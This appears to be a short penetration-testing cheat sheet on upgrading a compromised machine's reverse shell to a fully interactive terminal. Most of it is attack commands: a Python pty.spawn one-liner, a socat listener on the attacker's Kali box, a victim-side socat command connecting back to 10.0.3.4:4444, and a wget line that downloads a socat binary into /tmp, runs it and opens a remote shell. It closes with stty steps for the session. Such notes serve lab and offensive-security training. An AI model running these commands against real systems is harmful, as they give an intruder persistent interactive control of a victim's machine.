# Upgrading Shells

## Python

```
// python -c 'import pty; pty.spawn("/bin/bash")'
```

![Upgrading the shell to interactive with Python](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2F7CIGcX81Ay0Z9JH2o5ey%2F1f9de5acdf8a4540a8533c61523298fb.png?alt=media\&token=91fc0956-2a2f-4bb2-8930-50ad1ad3d9f6)

## Socat

#### On Kali ( Attacking Machine)

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

#### On Victim Machine

```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

![Using Socat to Upgrade the shell](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FioNHxO5rVuHG1LKpsXHE%2Fsocat_upgrade_shell.png?alt=media\&token=5150f07c-9db5-4bb8-a0de-0ae5449bb2b7)

#### On Victim Machine with no Socat

We will need to download a precompiled binary of socat from <https://github.com/andrew-d/static-binaries>\
\
we can then want to download the chosen binary into a folder that we have read and write control over

```
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

## Upgrading with Magic

We can upgrade a shell with "magic"\
The shell will be fully interactive and have synta\
The first step is to get the shell while in a bash command prompt (This cannot be done is ZSH...switch the shell with /bin/bash before connecting to the shell)

![](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FUJzDz80Vcn2zfcui4xXp%2Fbinbash.png?alt=media\&token=cd089a8e-72a7-4de3-9623-b9998ff6a45a)

\
then upgrade it with the python trick

![Upgrade the shell with Python](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FuM3JOfioKobIhEDLrhQz%2Fstep%201.png?alt=media\&token=c93514fb-e059-4a96-9396-9374b9e1fd28)

We then background the shell with ctrl + z

![backgrounding with ctrl z](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FSsi2MbqsuAJWXZguxsEV%2Fbackground_netcat.png?alt=media\&token=89da7b93-2f6b-45d8-95bf-892ac539732d)

We then issue the commands on our kali machine and make sure to take note of the values as we will need them for input on the victim machine

![](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FkuiEvHClHKMaDmjSc5em%2F2022-02-07%2017_19_52-Window.png?alt=media\&token=7fbfed71-02a9-474c-96c6-42e8d373900f)

We then  foreground with `fg` and then enter the commands to reset the console

![resetting the termina](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FzhFXNqQMgrPMkB3DmTap%2Ffg_reset.png?alt=media\&token=87986c52-0caa-4080-b7f4-c214bb04653f)

#### The commands

```
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

```